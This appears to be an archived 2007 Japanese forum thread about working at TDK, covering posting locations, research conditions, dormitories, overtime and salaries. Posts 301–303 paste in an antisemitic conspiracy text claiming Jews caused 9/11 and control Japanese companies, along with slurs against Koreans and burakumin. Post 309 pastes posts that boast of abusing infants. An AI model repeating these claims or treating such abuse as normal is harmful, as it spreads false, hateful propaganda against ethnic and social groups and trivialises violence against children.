266 :260:2007/01/21(日) 23:11:28 ID:C9LhYDmH
アンカーみすりました
>>264さんです

267 :名無しさん@3周年:2007/01/21(日) 23:52:45 ID:zfprNltG
>>265
下げるのではなくむしろ勤務地の優先順位は上げた方が良い。
TDKの開発は技術屋と違い根をおろして張り付きで仕事することになる。
少しでも立地条件の良い場所選ばないと家族諸共、最悪な事になる。
国内では100%地方にしかないのでおのずと行く場所は5つくらいの県に絞られる。

268 :akita:2007/01/22(月) 22:24:56 ID:kDKaf9zR
思ったんですけどTDKにとって秋田配属は「登竜門」なんでしょうか。
日本海側の小都市に新人や中途社員を配置し、
田舎暮らしや現場に耐えられない人はそこで淘汰され、
そこで生き残った、忍耐力があって、有能な人間を
本社・八幡に引き抜くという構図でしょうか。

だとしたら、それはそれでよくできたシステムだと思いますが。

269 :名無しさん@3周年:2007/01/22(月) 22:48:21 ID:heLA1zY7
>268
そんな訳無い。創業者の出身地なだけの理由。

わざわざ新しい工場建てようって奇特なとこもあるみたいだが。


270 :名無しさん@3周年:2007/01/22(月) 23:40:13 ID:3VhtwdKE
秋田主義こそが人材流出・機会損失の原因だろ
常識的に考えて

271 :名無しさん@3周年:2007/01/22(月) 23:43:52 ID:eaLk89TY
毎年某所で行われる某セミナーで
名刺もらう人はなぜか皆成田で基礎材料やってる人ばかり。
ところで、研究所の所長の名刺の住所が成田になってるのはなぜですか?
本八幡ではないの?

272 :名無しさん@3周年:2007/01/23(火) 01:31:15 ID:xPE2bLof
うち宮廷の工学系だけどここの推薦がない。
ほかの大学はあるの?TDK

273 :名無しさん@3周年:2007/01/23(火) 23:50:17 ID:7D4Ck1io
>>270
この意見はかなり正論だな。
勤務地でドロップは実際多いと思う。
最近は研究も秋田でやる動きがあるそうな。
成田、八幡、市川から民族大移動があるかもしれんな。
炉のない所でチマチマ研究しても無駄って話があるそうだ。
これもまた正論だが・・・。

274 :名無しさん@3周年:2007/01/24(水) 01:40:14 ID:T+SNpqA8
成田って電気炉ないの?量産用がないってこと?

275 :名無しさん@3周年:2007/01/24(水) 21:47:58 ID:sExCuF6t
>>274
雰囲気調整出切る現場叩き上げの職人がいないってこと。
狭い実験炉で成功してもデカイ炉でやったら全然データが違うのが物造り。
量産なんか関係ない。 現場で使ってる炉や雰囲気で研究しないと何もわからん。

そんなもんだ。

276 :負け組みT社:2007/01/24(水) 23:21:18 ID:T+SNpqA8
同じようなことよく言ってます。
というか、言われてます。
量産にもっていくと必ず特性に違いがでる。
うちは工場近いから、まだましだけど負けてます。

277 :名無しさん@3周年:2007/01/25(木) 15:30:11 ID:jES9TQMa
株価、久々に一万の大台突破
第三Qの決算はどうなるか。

278 :名無しさん@3周年:2007/01/25(木) 19:00:13 ID:TjIo+RV+
中途で営業職希望で入社しようかと思ってます。

ここの営業職ってどんな感じですか?
あと、本八幡の寮ってどんな感じですか?
給与面の待遇他のメーカーの平均よりいい印象がありますが、どうですか?

279 :名無しさん@3周年:2007/01/26(金) 00:03:23 ID:izTePn8g
>>278
アホの営業は要らんから他にいってくれ。
給料は安いし重労働だ。 知識無ければゴミ扱いです。
自分で勉強しないと誰も教えてくれない=取り残される=自然淘汰=退職

以上

280 :名無しさん@3周年:2007/01/26(金) 01:31:05 ID:leiWY+we
さーて、変な仕事でも入れるか

281 :名無しさん@3周年:2007/01/27(土) 00:06:45 ID:uUe2r4Dd
あほな技術者ですが残業100時間位したら
30時間位はつけられます?

282 :名無しさん@3周年:2007/01/27(土) 00:06:57 ID:uUe2r4Dd
あほな技術者ですが残業100時間位したら
30時間位はつけられます?

283 :サブロックエス:2007/01/28(日) 11:07:38 ID:THbxtZ0Q
やはりやりがいのある仕事は営業だろう。
自分で開発した製品を売り込みして、受注を獲得した満足感は
どんな職種でも味わえないと思う。
特に技術者から営業に行くのがベストだと思う。
文系のように値段だけて売るのではなく、技術で売ることにより
客も満足をするだろう。
俺も先日営業実習に行ったのだが、営業の楽しさが分かりよかった。
ただ、研究室に閉じこもっていてもだめだと感じた。
営業は忙しいが、その分やる気があるからいいと思う。
ぜひ営業に転職する技術者が増えることを願う。



284 :名無しさん@3周年:2007/01/28(日) 13:16:11 ID:6bQgZN8u
>>283
そんな奴が増えるってことは・・・
お先真っ暗だな。

285 :名無しさん@3周年:2007/01/30(火) 19:19:42 ID:Pe+FVBC4
----------------------------------------------------------------
TDKが30日発表した2006年4―12月期の連結決算(米国会計基準)は
純利益が前年同期比29%増の492億円だった。
電子部品の需要拡大が続くなか、デジタル家電やパソコン向けのコンデンサーが好調。
ハードディスク駆動装置(HDD)用磁気ヘッドでの価格下落を補った。
----------------------------------------------------------------
第3四半期決算は予想より良かったようで。
クリスマス商戦は好調だったか。

ますますコンデンサ(秋田)の重要性が増すってことか・・。

286 :名無しさん@3周年:2007/01/30(火) 21:53:31 ID:JTn/AS1z
>>282
子会社なら無理w =どの会社も同じ
本社ならokじゃない??=上長の判断にもよるが。。。

>>283
理想はまさにそれ。
設計、材料等の知識がある奴が売り込むのは面白いと思う。
確かTDKって営業促進って部隊なかった!? それはまた違う部隊か??

287 :名無しさん@3周年:2007/02/04(日) 01:03:59 ID:bcP9BbvW
ここは転職者でも、寮に入れますか?
住宅補助とかはないんですよね。
すみませんがわかる人がいらっしゃったら
教えてください。

288 :名無しさん@3周年:2007/02/04(日) 01:57:25 ID:eTee7jfi
>>287
入れますよ。
住宅補助は転勤時に結婚してないとダメ。

289 :名無しさん@3周年:2007/02/04(日) 15:19:19 ID:bcP9BbvW
>>288
レスありがとうございます。
未婚なので選択肢は寮しかないですね。

290 :名無しさん@3周年:2007/02/05(月) 20:50:05 ID:siidEeWy
月/1000円だったっけ? 死ぬほど安いなww
社宅も安いけど。

291 :名無しさん@3周年:2007/02/05(月) 22:04:22 ID:MSxDyeLw
色々教えていただきありがとうございました。
1000円いいですね。多少ぼろくても我慢します。
その前に採用してもらわないと・・・。

292 :名無しさん@3周年:2007/02/06(火) 00:11:48 ID:bWQpLld1
>>291
泥沼の会社生活が待っていますよ。
秋田にいらっしゃい!

293 :名無しさん@3周年:2007/02/06(火) 07:21:51 ID:plCOCig5
>>291
駐車場の方が高いという罠

294 :名無しさん@3周年:2007/02/13(火) 02:47:32 ID:PxVFBQfS
ちょっとは 磁気デバイスのシェア分けてください by A 

295 :名無しさん@3周年:2007/02/16(金) 22:23:30 ID:zwv0r/yg
週間アエラの特集記事を見ましたか。
俺は見たよ。
平均年収は40歳で780万と言う金額だ。
あのキャノンと変わらないのだ。
俺は40で約600万だ。
しかしからくりがあることが分かった。
45から急に給料が上がる仕掛けなのだ。
人によっては毎年100万近く上がる人もいるという。
そういうことで早く会社を辞めることは損だと感じるわ。
45を過ぎれば幸せな生活が待っている。
楽しみだ。
それまでに幸せを見つけたい気分です。


296 :名無しさん@3周年:2007/02/16(金) 23:52:54 ID:8dD5Pukj
勝ち組乙

297 :名無しさん@3周年:2007/02/17(土) 08:57:49 ID:uY7M+cAV
>>295
管理職につくからでしょ。誰でもそんなに上がる訳が無い。
管理職になれなきゃ現状プラス少々で終わり。
すでに管理職なら1千万前後はもらっている。
オレは社外だが、会社側は45からは如何に支払わない
ようにするかということが本音。
会社は異なっても世間で言う賃金カーブは常識。
負け組乙!

298 :名無しさん@3周年:2007/02/17(土) 12:14:20 ID:4hnzMyYb
>>297
そのとをり、ここは学歴など関係ないよ。
完全実力主義だ。
今の幹部をみれば納得だね。
俺の知り合いのいる日立中央研究所やソニー開発研などはびっくりだ。
まさちゅーせっつ大学院やIBM研究所などがごろごろいるのだ。
東京大学なんて普通見たいだぞ。
俺のいる部署の退職した人の話だ。
55過ぎたら給料は上がらないみたいです。
いまの30代の給料は大体300万円後半だろう。
でも50代は1200万ぐらいでしょ。
いくらなんでももらいすぎだろう。
俺も隣にいる退職寸前の上司に給料を聞いたが、びっくりしたよ。
俺の約3倍。
仕事量は同じくらいなのにな。




299 :名無しさん@3周年:2007/02/17(土) 19:36:06 ID:JG6ewWSL
さすがに300万台はない

300 :名無しさん@3周年:2007/02/18(日) 10:54:39 ID:UOPKO32q
手取りだと300万逝かないと感じるよ。
残業なしだと、さんけたやっとだね。

301 :名無しさん@3周年:2007/02/18(日) 12:13:30 ID:hK7uzvgU
344 :richardkoshimizu:2007/02/11(日) 10:29:24 ID:9T1zZMM4
ユダヤ商法。だめだこりゃ。
http://richardkoshimizu.at.webry.info/200702/article_12.html

ユダヤ権力は自ら引き起こした911テロにより、株価を暴落させ、2001年9月12日の東京市場で、日経平均1万円割れ
した日本株を買い漁った。これを、世界規模のユダヤ・インサイダー取引という。

また、それ以降は、飼い犬の小泉・竹中を使って意図的な緊縮財政を行わせ、不況を演出し株価を凋落させた。金融
恐慌を恐れて日本人が株式市場を敬遠していたさなか、ユダヤ人たちは底値で日本株を買いまくった。2年後、景気を
回復させて株価が反騰し、ユダヤ人はぼろもうけした。

また、りそな銀行については、小泉・竹中に「救済しない」と示唆させて、株価を暴落させておいて、ユダヤ人だけが底
値で買い漁り、竹中に急遽、2兆円の政府救済策を発表させて、株価を大反騰させた。ユダヤ人丸儲けである。

この手口で、日本の優良企業の株は、底値でユダヤ人たちに買い込まれた。いつのまにか、大手企業の株の3-6割を
ユダヤ人が所有する事態となった。

外国人持ち株比率が高い企業 (ごく一例に過ぎない。)
1 オリックス 54.6 (15.3)
2 HOYA 54.4 (7.6)
3 ヤマダ電機 51.7 (6.1)
4 キヤノン 50.9 (3.5)
5 クレディセゾン 50.8 (10.8)
6 ドン・キホーテ 48.5 (15.1)
7 日東電工 47.7 (6.6)
8 ローム 47.2 (▲0.9)
9 メイテック 46.5 (11.4)
10 塩野義製薬 45.6 (2.1)

302 :名無しさん@3周年:2007/02/18(日) 12:15:53 ID:hK7uzvgU
345 :richardkoshimizurichardkoshimizu:2007/02/11(日) 10:30:42 ID:9T1zZMM4

ユダヤ支配となった企業には、過酷な「配当金」捻出が強要される。四半期ごとに業績を評価され、とにかく利益を出し
て配当するよう大株主のユダヤ人から指示される。結果、これらの半ユダヤ企業は、異様に高い配当を行う。

06年3月期の大幅増配企業の例

企業名・・・・・・・1株配当・前期・・外国人持ち株比率

野村ホールディング・48円・・ 20円・・38.8%
オリックス・・・・・90円・・ 40円・・60.3%
住友商事・・・・・・22円・・ 11円・・35.7%
信越化学工業・・・・35円・・ 20円・・36.8%
三菱商事・・・・・・30円・・ 18円・・33.4%
エーザイ・・・・・・90円・・ 56円・・36.2%
ファナック・・・・・62円・・ 45円・・45.1%
オムロン・・・・・・30円・・ 24円・・36.8%
アドバンテスト・・・70円・・ 50円・・36.4%

ユダヤ人たちは、企業の5年、10年先には興味がない。今、儲かるかどうかしか眼中にない。よって、これらの企業は
中長期的投資計画が組めない。研究開発資金を配当に回させられる。企業の将来性が削がれる。だが、ユダヤ人
たちには、なんの関係もない。自分たちに利益になると分ければ、単純に保有株を売り払う。安定株主なんて、演じ
る積もりはさらさらない。株売却後は、その会社がどうなろうと知ったことではない。

303 :名無しさん@3周年:2007/02/18(日) 12:18:25 ID:hK7uzvgU
346 :richardkoshimizurichardkoshimizu:2007/02/11(日) 10:31:24 ID:9T1zZMM4
ま、こんな形で、日本はユダヤ人のマネーゲームの会場と化し、日本人は必死に働いて、ユダヤ人に搾取される立派
な役割を果たしているわけです。さらには、今後は、残業代カット合法化も実現し、サラリーマンの残業代がなくなった
分、企業の業績を上げ、株主のユダヤ人の懐を暖かくするわけです。その分、サラリーマンの家計が疲弊する。一方
で、5月からの三角買収解禁により、ユダヤ企業は、国内に作った子会社を経由して、日本の優良企業をどんどん
敵対買収できるようになる。(買収の対価として、本社の株を使えるようになる。)米欧の本社の株価は総じて、日本
企業の株よりはるかに高いので、本社の株をほんの少し差し出せば、日本企業なんて、簡単に乗っ取れる。はい、
これにて、美味しい日本企業は、次々にユダヤ化。日本人は皆奴隷化。

こう言った一連のユダヤ売り渡し売国作戦を進めてきたのが、小泉・竹中・安倍の朝鮮・部落連合。ユダヤ人は、
反日マイノリティーかくれ朝鮮人と部落を使って、日本からの略奪作戦を敢行中なのである。

ところが、その反日マイノリティーが支配する統一教会自民党と創価学会公明党が、我が国の政権政党なのである。
従って、駄目だコリャである。

あ〜自棄酒が旨い。

304 :名無しさん@3周年:2007/02/18(日) 17:12:06 ID:ypqZcdoG
スレタイがTDNに見えたぜ・・・

305 :名無しさん@3周年:2007/02/18(日) 21:57:24 ID:YDFIWp2A
あげ

306 :名無しさん@3周年:2007/02/18(日) 22:15:01 ID:RCaD2FFy
今年度中にTDKでお世話になることと思います
よろしくお願いします


307 :名無しさん@3周年:2007/02/19(月) 02:15:17 ID:mJ9YOOmR
ここって人事部長と濃密なこねがありゃ、入社10年以内に管理職とかありえんのかな

308 :まるくす:2007/02/19(月) 10:51:08 ID:XPfxlwKN
完全実力なので、30代で主事、いや主査になることも可能ですね。
管理職になればヨンケタごえでいいね。

309 :名無しさん@3周年:2007/02/19(月) 11:24:52 ID:EvkpxJD7
児イライラどう発散してる?育児板
http://life8.2ch.net/test/read.cgi/baby/1041904343/

768 名前:名無しの心子知らず[] 投稿日:2006/11/18(土) 14:05:59 ID:2Hs402Ah
私は旦那に当り散らす。(爆睡してるときも)小さい赤いじめより楽しいよ。
だから、日曜日がくるのが大嫌い。ご飯もわざとインスタントで召し上がれ〜

778 名前:名無しの心子知らず[] 投稿日:2006/11/18(土) 15:42:15 ID:2Hs402Ah
768です。赤にあたって罪悪感は残るけど、ほんと旦那にあったても
罪悪感ゼロだよ。ほんと、お勧めよ。

808 名前:名無しの心子知らず[] 投稿日:2006/11/27(月) 20:06:15 ID:Ilu7VO4B
赤@21日は、よく泣くのでイライラしたら足首つかんで逆さまにする。
産まれてスグ泣かなければ逆さまにしてお尻叩くし大丈夫だよね・・・・
お尻は叩きすぎて、内出血で大変なことになってる・・・
はやくよくならないと一ヵ月健診連れてけないなぁー

815 名前:名無しの心子知らず[] 投稿日:2006/11/27(月) 22:02:53 ID:/JF3+pe5
軽くネグレクトするw
ご飯食べさせて歯磨きして、おむつ変えたら2時間程ネットに集中。
袖引っ張ってきても無視して放置。

909 名前:名無しの心子知らず[] 投稿日:2007/01/26(金) 14:17:33 ID:S+JXf2ib
あら、ぶつひとはいないの?
子はもうすぐ1歳だが、悪さをするたびに鉄拳制裁だ
びんた4回でこうち4回つきころばしを2回やって、
まだ叩きたい衝動がおさえられず、おむつのみにして寒部屋に放置すること1時間

310 :名無しさん@3周年:2007/02/20(火) 00:58:06 ID:2qJl2qZ+
本社事務採用だと勤務地はどこが濃厚ですか?
経理は工場が多いと聞きましたが
営業、その他はどうなんですか?

311 :名無しさん@3周年:2007/02/20(火) 23:52:36 ID:ZoyK79QZ
>>308
特命係長もいるぞ。

312 :名無しさん@3周年:2007/02/21(水) 01:39:14 ID:8FfNZHaL
>>310
経理は転々とする。
他も全国各地可能性はあります。


313 :名無しさん@3周年:2007/02/21(水) 22:23:13 ID:/F9Hcxig
>>311
万年係長のあの方ですね?

314 :ハッピータウン:2007/02/22(木) 18:19:18 ID:NfIgnSPJ
俺の知り合いには30代で主査になったやつがいる。
すごいなあ。
毎日、遅くまで仕事だ。
残業も多いのだろう。
定時に帰えるのは月に数えられるくらいらしい。
午前様になることもあるようだ。
あなたたちの回りにもすごい奴がいるか。

315 :名無しさん@3周年:2007/02/22(木) 23:22:41 ID:C4xOjA2L
huhu

79 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)